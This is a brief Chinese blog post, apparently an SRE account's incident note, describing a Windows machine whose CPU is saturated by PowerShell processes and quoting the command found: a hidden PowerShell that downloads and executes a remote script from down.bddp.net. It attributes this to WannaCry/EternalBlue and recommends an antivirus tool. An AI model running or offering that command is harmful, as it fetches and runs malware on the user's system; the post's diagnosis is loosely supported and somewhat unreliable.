今天win机器进程出现大量 powershell.exe,把cpu占满100%,打开任务管理器看到如下信息:

powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).downloadstring('http://down.bddp.net/)"

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

WannaCrypt(永恒之蓝) down.bddp.net 随笔 第1张

百度后结果显示:中了永恒之蓝病毒

WannaCrypt(永恒之蓝) down.bddp.net 随笔 第2张

--------------------------------解决办法-------------------------------

下载360安全卫士,木马查杀方可破解。

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄